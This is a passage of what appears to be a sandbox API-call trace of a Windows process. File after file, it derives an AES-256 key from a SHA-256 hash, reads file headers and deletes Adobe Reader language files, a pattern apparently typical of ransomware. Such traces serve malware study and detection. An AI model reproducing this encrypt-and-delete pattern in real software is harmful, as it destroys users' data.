hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0222.770] CryptHashData (hHash=0x284d568, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0222.770] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0222.770] GetFileSize (in: hFile=0x6a0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6ec8 [0222.770] ReadFile (in: hFile=0x6a0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0222.808] CryptDestroyHash (hHash=0x284d568) returned 1 [0222.808] CryptDestroyKey (hKey=0x284d728) returned 1 [0222.808] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0222.810] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_VE.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_ve.txt")) returned 1 [0222.811] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0222.812] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0222.812] CryptHashData (hHash=0x284d768, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0222.812] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0222.812] GetFileSize (in: hFile=0x6a4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6ec6 [0222.812] ReadFile (in: hFile=0x6a4, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0222.815] CryptDestroyHash (hHash=0x284d768) returned 1 [0222.815] CryptDestroyKey (hKey=0x284d728) returned 1 [0222.815] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0222.816] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es__TRADITIONAL.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es__traditional.txt")) returned 1 [0222.818] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0222.818] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0222.818] CryptHashData (hHash=0x284d568, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0222.818] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0222.818] GetFileSize (in: hFile=0x6a0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6b5e [0222.818] ReadFile (in: hFile=0x6a0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0222.822] CryptDestroyHash (hHash=0x284d568) returned 1 [0222.822] CryptDestroyKey (hKey=0x284d728) returned 1 [0222.822] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0222.823] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.et.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.et.txt")) returned 1 [0222.824] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0222.825] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0222.825] CryptHashData (hHash=0x284d768, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0222.825] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0222.825] GetFileSize (in: hFile=0x6a4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6b5e [0222.825] ReadFile (in: hFile=0x6a4, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0222.839] CryptDestroyHash (hHash=0x284d768) returned 1 [0222.839] CryptDestroyKey (hKey=0x284d728) returned 1 [0222.839] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0222.840] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.et_EE.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.et_ee.txt")) returned 1 [0222.842] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0222.842] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0222.843] CryptHashData (hHash=0x284d568, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0222.843] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0222.843] GetFileSize (in: hFile=0x6a0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6d74 [0222.843] ReadFile (in: hFile=0x6a0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0222.846] CryptDestroyHash (hHash=0x284d568) returned 1 [0222.846] CryptDestroyKey (hKey=0x284d728) returned 1 [0222.846] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0222.847] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.fi.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.fi.txt")) returned 1 [0222.849] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0222.850] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0222.850] CryptHashData (hHash=0x284d768, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0222.850] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0222.850] GetFileSize (in: hFile=0x6a4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6d74 [0222.850] ReadFile (in: hFile=0x6a4, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0222.853] CryptDestroyHash (hHash=0x284d768) returned 1 [0222.853] CryptDestroyKey (hKey=0x284d728) returned 1 [0222.853] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0222.855] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.fi_FI.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.fi_fi.txt")) returned 1 [0222.856] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0222.857] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0222.857] CryptHashData (hHash=0x284d568, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0222.857] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0222.857] GetFileSize (in: hFile=0x6a0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6d7a [0222.857] ReadFile (in: hFile=0x6a0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0222.862] CryptDestroyHash (hHash=0x284d568) returned 1 [0222.862] CryptDestroyKey (hKey=0x284d728) returned 1 [0222.862] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0222.863] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.fi_FI_PREEURO.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.fi_fi_preeuro.txt")) returned 1 [0222.865] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0222.866] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0222.866] CryptHashData (hHash=0x284d768, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0222.866] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0222.866] GetFileSize (in: hFile=0x6a4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6f48 [0222.866] ReadFile (in: hFile=0x6a4, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0222.873] CryptDestroyHash (hHash=0x284d768) returned 1 [0222.873] CryptDestroyKey (hKey=0x284d728) returned 1 [0222.873] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0222.874] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.fr_CA.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.fr_ca.txt")) returned 1 [0222.877] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0222.877] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0222.877] CryptHashData (hHash=0x284d568, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0222.877] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0222.877] GetFileSize (in: hFile=0x6a0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6f48 [0222.877] ReadFile (in: hFile=0x6a0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0222.889] CryptDestroyHash (hHash=0x284d568) returned 1 [0222.889] CryptDestroyKey (hKey=0x284d728) returned 1 [0222.889] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0222.891] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.fr_FR.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.fr_fr.txt")) returned 1 [0222.892] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0222.893] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0222.893] CryptHashData (hHash=0x284d768, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0222.893] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0222.893] GetFileSize (in: hFile=0x6a4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6f44 [0222.893] ReadFile (in: hFile=0x6a4, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0222.913] CryptDestroyHash (hHash=0x284d768) returned 1 [0222.913] CryptDestroyKey (hKey=0x284d728) returned 1 [0222.914] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0222.915] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.fr_FR_PREEURO.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.fr_fr_preeuro.txt")) returned 1 [0222.916] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0222.946] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0222.946] CryptHashData (hHash=0x284d568, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0222.946] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0222.946] GetFileSize (in: hFile=0x6a0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x67c2 [0222.946] ReadFile (in: hFile=0x6a0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0222.957] CryptDestroyHash (hHash=0x284d568) returned 1 [0222.957] CryptDestroyKey (hKey=0x284d728) returned 1 [0222.957] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0222.958] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.he.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.he.txt")) returned 1 [0222.960] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0222.960] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0222.960] CryptHashData (hHash=0x284d768, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0222.960] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0222.960] GetFileSize (in: hFile=0x6a4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x67c2 [0222.960] ReadFile (in: hFile=0x6a4, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0222.971] CryptDestroyHash (hHash=0x284d768) returned 1 [0222.971] CryptDestroyKey (hKey=0x284d728) returned 1 [0222.971] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0222.972] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.he_IL.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.he_il.txt")) returned 1 [0222.974] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0222.974] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0222.974] CryptHashData (hHash=0x284d568, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0222.974] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0222.974] GetFileSize (in: hFile=0x6a0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6e28 [0222.974] ReadFile (in: hFile=0x6a0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0222.978] CryptDestroyHash (hHash=0x284d568) returned 1 [0222.978] CryptDestroyKey (hKey=0x284d728) returned 1 [0222.978] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0222.979] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.hr.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.hr.txt")) returned 1 [0222.981] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0222.981] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0222.981] CryptHashData (hHash=0x284d768, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0222.981] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0222.981] GetFileSize (in: hFile=0x6a4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6e28 [0222.981] ReadFile (in: hFile=0x6a4, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0222.985] CryptDestroyHash (hHash=0x284d768) returned 1 [0222.985] CryptDestroyKey (hKey=0x284d728) returned 1 [0222.985] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0222.986] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.hr_HR.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.hr_hr.txt")) returned 1 [0222.988] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0222.989] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0222.989] CryptHashData (hHash=0x284d568, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0222.989] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0222.989] GetFileSize (in: hFile=0x6a0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6dfe [0222.989] ReadFile (in: hFile=0x6a0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0223.019] CryptDestroyHash (hHash=0x284d568) returned 1 [0223.019] CryptDestroyKey (hKey=0x284d728) returned 1 [0223.019] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0223.021] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.hu.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.hu.txt")) returned 1 [0223.022] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0223.023] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0223.023] CryptHashData (hHash=0x284d768, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0223.023] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0223.023] GetFileSize (in: hFile=0x6a4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6dfe [0223.023] ReadFile (in: hFile=0x6a4, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0223.027] CryptDestroyHash (hHash=0x284d768) returned 1 [0223.027] CryptDestroyKey (hKey=0x284d728) returned 1 [0223.027] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0223.028] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.hu_HU.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.hu_hu.txt")) returned 1 [0223.030] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0223.030] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0223.030] CryptHashData (hHash=0x284d568, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0223.030] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0223.030] GetFileSize (in: hFile=0x6a0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6e88 [0223.030] ReadFile (in: hFile=0x6a0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0223.038] CryptDestroyHash (hHash=0x284d568) returned 1 [0223.038] CryptDestroyKey (hKey=0x284d728) returned 1 [0223.038] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0223.040] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.it.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.it.txt")) returned 1 [0223.042] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0223.042] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0223.042] CryptHashData (hHash=0x284d768, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0223.042] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0223.042] GetFileSize (in: hFile=0x6a4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6e8e [0223.042] ReadFile (in: hFile=0x6a4, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0223.046] CryptDestroyHash (hHash=0x284d768) returned 1 [0223.046] CryptDestroyKey (hKey=0x284d728) returned 1 [0223.046] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0223.047] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.it_CH.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.it_ch.txt")) returned 1 [0223.048] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0223.049] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0223.049] CryptHashData (hHash=0x284d568, pbData=0x9ed790, 